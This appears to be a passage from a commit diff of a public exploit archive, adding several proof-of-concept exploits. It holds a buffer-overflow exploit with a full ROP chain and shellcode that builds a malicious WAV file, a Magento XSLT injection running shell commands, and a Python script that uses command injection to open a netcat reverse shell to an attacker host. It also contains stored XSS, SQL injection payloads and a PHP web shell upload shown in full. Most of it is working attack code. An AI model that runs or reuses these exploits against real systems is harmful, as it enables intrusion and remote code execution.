0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh"
####################### STACK PIVOT ###########################
SEH = struct.pack("<I", 0x005CE870) # 0x005CE870 add esp 0x800, 4 pops, ret [alltomp3.exe]
####################### 1. Get Stack Pointer to point to ZZZZ ###########################
ROP = struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0xffffff1c)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)
ROP += b"A" * 4
# ecx points to ZZZZ
####################### 2. Get and set ZZZZ to HeapCreate ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) [Module : lame_enc.dll]
ROP += b"A" * 0x10
ROP += struct.pack("<I", 0x1003D058) # HEAPCREATE IAT
ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret ; (1 found) [Module : lame_enc.dll]
ROP += struct.pack("<I", 0x41414141)
# eax has HeapCreate
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]
####################### 3. Set RET ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found)
ROP += struct.pack("<I", 0x1001939e) # 0x1001939e: add esp, 0x000001A0 ; ret ; (1 found)
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
####################### 4. Go to HeapCreate ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffea4)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)
ROP += struct.pack("<I", 0x1002a3b5)*10 # 0x1002a3b5: ret ; (1 found) // pad it
# when heap create finishes, eax will have hHeap
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
####################### 5. Get Stack Pointer to point to YYYY ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffe58)
ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*3
ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)
ROP += b"A" * 4
# ecx points to YYYY
####################### 6. Get and set YYYY to HeapAlloc ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) [Module : lame_enc.dll]
ROP += b"A" * 0x10
ROP += struct.pack("<I", 0x1003D014) # HEAPALLOC IAT
ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret ; (1 found) [Module : lame_enc.dll]
ROP += struct.pack("<I", 0x41414141)
# eax has HeapCreate
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]
####################### 7. Set RET ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found)
ROP += struct.pack("<I", 0x10014d32) # 0x10014d32: add esp, 0x00000280 ; ret ; (1 found)
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]
####################### 8. Set hHEAP ###########################
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) <- should return here and start executing here
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
####################### 9. Go to HeapAlloc ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffdcc)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)
# when heap create finishes, eax will have hHeap
ROP += struct.pack("<I", 0x1002a3b5)*20 # 0x1002a3b5: ret ; (1 found) // pad it
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
####################### 10. Get Stack Pointer to point to DDDD ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffd5c)
ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*3
ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)
ROP += b"A" * 4
# ecx points to DDDD
####################### 12. Set RET ###########################
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
ROP += b"A"*0x10
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]
####################### 13. DESTIN ###########################
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x100345ee)*8 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]*
####################### 14. SOURCE ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0x000000a0)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
####################### 15. GOTO _memcpy_s ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffc94)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)
####################### SHELLCODE ###########################
shellcode = b"\xcc" * 400
real_shellcode = b"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"
real_shellcode += b"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"
real_shellcode += b"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"
real_shellcode += b"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"
real_shellcode += b"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"
real_shellcode += b"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"
real_shellcode += b"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"
real_shellcode += b"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"
real_shellcode += b"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"
real_shellcode += b"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"
real_shellcode += b"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"
real_shellcode += b"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"
real_shellcode += b"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"
real_shellcode += b"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"
real_shellcode += b"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"
real_shellcode += b"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68"
real_shellcode += b"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57"
real_shellcode += b"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c"
real_shellcode += b"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78"
real_shellcode += b"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"
####################### CONSTRUCT ###########################
SIZE = 500
start_of_padding = b"A" * (SIZE-len(EXE)-len(shellcode))
start_of_padding += shellcode
start_of_padding += EXE
SIZE = 1500
RET_NOP_TO_ROP = b"A" * 0x70 + struct.pack("I", 0x1003c6aa) * 10 # RET
#INT = struct.pack("I", 0x1000f2b3) + b"BBBB" # 0x1000f2b3: int3 ; pop esi ; ret ; (1 found)
INT = struct.pack("I", 0x1003c6aa)*2
rest_of_payload = RET_NOP_TO_ROP + INT + ROP # 160 + 14*4 + 172
rest_of_payload += b"\x90" * 100
rest_of_payload += real_shellcode
rest_of_payload += b"\x90" * (SIZE-len(rest_of_payload))
payload = junk + SEH + start_of_padding + rest_of_payload
REST = b"\x44" * (size-len(payload))
payload += REST
file = open("1.wav", "wb")
file.write(payload)
file.close()

29
exploits/multiple/webapps/51847.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection
Date:** 2023-11-17
Exploit Author:** tmrswrr
Vendor Homepage:** [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
Software Link:** [Magento 2.4.6-p3](https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip)
Version:** 2.4.6
Tested on:** 2.4.6
## POC
1. Enter with admin credentials to this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`
3. Choose Import Source is File
4. Click `XSLT Configuration` and write this payload:
```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl">
<xsl:template match="/">
<xsl:value-of select="php:function('shell_exec','id')" />
</xsl:template>
</xsl:stylesheet>```
##RESULT
**<?xml version="1.0"?>
**uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

61
exploits/multiple/webapps/51856.py Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution
# Date: 30-11-2023
# Exploit Author: Melvin Mejia
# Vendor Homepage: https://jpylypiw.github.io/easywall/
# Software Link: https://github.com/jpylypiw/easywall
# Version: 0.3.1
# Tested on: Ubuntu 22.04
import requests, json, urllib3
urllib3.disable_warnings()
def exploit():
# Replace values needed here
target_host = "192.168.1.25"
target_port= "12227"
lhost = "192.168.1.10"
lport = "9001"
user = "admin"
password = "admin"
target = f"https://{target_host}:{target_port}"
# Authenticate to the app
print("[+] Attempting login with the provided credentials...")
login_data = {"username":user, "password":password}
session = requests.session()
try:
login = session.post(f'{target}/login',data=login_data,verify=False)
except Exception as ex:
print("[!] There was a problem connecting to the app, error:", ex)
exit(1)
if login.status_code != 200:
print("[!] Login failed.")
exit(1)
else:
print("[+] Login successfull.")
# Send the payload, the port parameter suffers from a command injection vulnerability
print("[+] Attempting to send payload.")
rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'
data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}
send_payload = session.post(f"{target}/ports-save",data=data,verify=False)
if send_payload.status_code != 200:
print("[!] Failed to send payload.")
exit(1)
else:
print("[+] Payload sent.")
# Trigger the execution of the payload
print("[+] Attempting execution.")
data = {"step_1":"", "step_2":""}
execute = session.post(f"{target}/apply-save",data=data, verify=False)
if execute.status_code != 200:
print("[!] Attempt to execute failed.")
exit(1)
else:
print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")
exploit()

19
exploits/php/remote/51836.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27743
# Description: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the Address parameter in the add_invoices.php component.
# POC:
1. Here we go to : http://localhost/fuelflow/index.php
2. Now login with default username=mayuri.infospace@gmail.com and
Password=admin
3. Now go to "http://localhost/fuelflow/admin/add_invoices.php"
4. Fill the payload "<script>alert(0)</script>" in "Address" field
5. Stored XSS will be present in "
http://localhost/fuelflow/admin/manage_invoices.php" page
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.md

31
exploits/php/remote/51837.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27744
# Description: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the image parameter in the profile.php component.
# POC:
1. Here we go to : http://localhost/fuelflow/index.php
2. Now login with default username=mayuri.infospace@gmail.com and
Password=admin
3. Now go to "http://localhost/fuelflow/admin/profile.php"
4. Upload the xss.svg file in "Image" field
5. Stored XSS will be present in "
http://localhost/fuelflow/assets/images/xss.svg" page
6. The content of the xss.svg file is given below:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("XSS by Shubham Pandey");
</script>
</svg>
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.md

16
exploits/php/remote/51838.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Petrol Pump Management Software v.1.0 - SQL Injection
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27746
# Description: SQL Injection vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email address parameter in the index.php component.
# POC:
1. Here we go to : http://localhost/fuelflow/index.php
2. Now login with username: test@test.com';SELECT SLEEP(10)# and
Password=test
3. Page will load for 10 seconds because of time-based sql injection
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.md

21
exploits/php/remote/51839.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27747
# Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email Image parameter in the profile.php component.
# POC:
1. Here we go to : http://localhost/fuelflow/index.php
2. Now login with default username=mayuri.infospace@gmail.com and
Password=admin
3. Now go to "http://localhost/fuelflow/admin/profile.php"
4. Upload the phpinfo.php file in "Image" field
5. Phpinfo will be present in "
http://localhost/fuelflow/assets/images/phpinfo.php" page
6. The content of phpinfo.php file is given below:
<?php phpinfo();?>
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.md

146
exploits/php/remote/51840.txt Normal file
View file

@ -0,0 +1,146 @@
# Exploit Title: Real Estate Management System v1.0 - Remote Code Execution via File Upload
# Date: 2/11/2024
# Exploit Author: Diyar Saadi
# Vendor Homepage: https://codeastro.com
# Version: V1.0
# Tested on: Windows 11 + XAMPP 8.0.30 + Burp Suite Professional v2023.12.1.3
## Description ##
This Vulnerability allow the attacker to execute command injection payloads and upload malicious file into web server .
-----------------------------------------------------------------------------------------------------------------------
## Simple RCE Payload : ##
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system_payload($_GET['cmd']);
}
?>
</pre>
</body>
</html>
-----------------------------------------------------------------------------------------------------------------------
## Steps to Reproduce ##
1- Open Burp Suite ( Community + Professional ) + Click on Proxy Tab Then Enable Intercept By Clicking at Intercept is off .
2- Open The Browser From Proxy Tab Then Open The Resgister Web Page : http://localhost:8080/realestate/register.php
3- Prepare Your RCE PHP Script Base From Notepad or Any Editor Then Save the RCE PHP Script Base as : avatar.php filename .
4- Change The Filename extension into avatar.png , after save the RCE PHP Script .
5- Click Chose File From User Image Section Then Upload Your avatar.png file .
6- Click Register Then Back to Burp Suite Proxy Tab :
7- Modify File Extension Into Orginal File Extension that is : avatar.php in Example : Content-Disposition: form-data; name="uimage"; filename="avatar.png"
Content-Type: image/png .
8- After Modify The Content-Disposition From Burp Suite Proxy Tab Into Orginal File Extension Click Forward Button .
9- Open The Login Page : http://localhost:8080/realestate/login.php Then Register Through Your Account Email & Password .
10 - From MenuBar Click My Account & Profile Then Right Click at Image Icon > Copy Link > New Tab > Paste > Your Malicious Command is Ready To Execute .!
-----------------------------------------------------------------------------------------------------------------------
## Burp Request : ##
POST /realestate/register.php HTTP/1.1
Host: localhost
Content-Length: 1100
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywA99kZOAu8APGlhv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/realestate/register.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="name"
johnhamosh
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="email"
rasu1l@in.com
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="phone"
+199988764
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="pass"
<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="utype"
user
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="uimage"; filename="avatar.php"
Content-Type: image/png
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="reg"
Register
------WebKitFormBoundarypgW90eleiRxRzcEK--
-----------------------------------------------------------------------------------------------------------------------
## PoC Simple RCE Through This Vulnerability : ##
Directory of C:\xampp\htdocs\realestate\admin\user
..
02/11/2024 08:09 PM 315 avatar.php
02/11/2024 08:04 PM 315 avatar.png
02/11/2024 06:54 PM 9,376 avatarm2-min.jpg
02/11/2024 06:54 PM 13,186 avatarm7-min.jpg
02/11/2024 07:47 PM 1,814 avatars.php
02/11/2024 06:54 PM 1,313 gr7.png
02/11/2024 07:36 PM 28 poc.php
-----------------------------------------------------------------------------------------------------------------------
## Video PoC : ##
1- https://github.com/vulnerablecms/RCE-RealEstateVIDEOPOC/blob/main/PoC-RCE.mp4
2- https://gofile.io/d/AEWEgI
-----------------------------------------------------------------------------------------------------------------------
Greetz !

32
exploits/php/remote/51841.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Simple Student Attendance System - Time Based Blind SQL Injection
# Date: 26 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL
-------------------------------------------------------------------------------------------------------------------------------------------
Source Code(/php-attendance/classes/actions.class.php):
public function delete_student(){
extract($_POST);
$delete = $this->conn->query("DELETE FROM `students_tbl` where `id` = '{$id}'");
if($delete){
$_SESSION['flashdata'] = [ 'type' => 'success', 'msg' => "Student has been deleted successfully!" ];
return [ "status" => "success" ];
}else{
$_SESSION['flashdata'] = [ 'type' => 'danger', 'msg' => "Student has failed to deleted due to unknown reason!" ];
return [ "status" => "error", "Student has failed to deleted!" ];
}
}
-> sqlmap -u "http://localhost/php-attendance/ajax-api.php?action=delete_student" --data="id=7" --technique=T --batch
---
Parameter: id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=7' AND (SELECT 3738 FROM (SELECT(SLEEP(5)))kVAW) AND 'vAFW'='vAFW
---

33
exploits/php/remote/51842.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Simple Student Attendance System v1.0 - 'classid' Time Based Blind & Union Based SQL Injection
# Date: 26 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL
-------------------------------------------------------------------------------------------------------------------------------------------
Source Code(/php-attendance/classes/actions.class.php):
public function attendanceStudents($class_id = "", $class_date = ""){
if(empty($class_id) || empty($class_date))
return [];
$sql = "SELECT `students_tbl`.*, COALESCE((SELECT `status` FROM `attendance_tbl` where `student_id` = `students_tbl`.id and `class_date` = '{$class_date}' ), 0) as `status` FROM `students_tbl` where `class_id` = '{$class_id}' order by `name` ASC";
$qry = $this->conn->query($sql);
$result = $qry->fetch_all(MYSQLI_ASSOC);
return $result;
}
-> sqlmap -u "http://localhost/php-attendance/?page=attendance&class_id=446&class_date=0002-02-20" --batch
---
Parameter: class_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=attendance&class_id=446' AND (SELECT 5283 FROM (SELECT(SLEEP(5)))zsWT) AND 'nqTi'='nqTi&class_date=0002-02-20
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
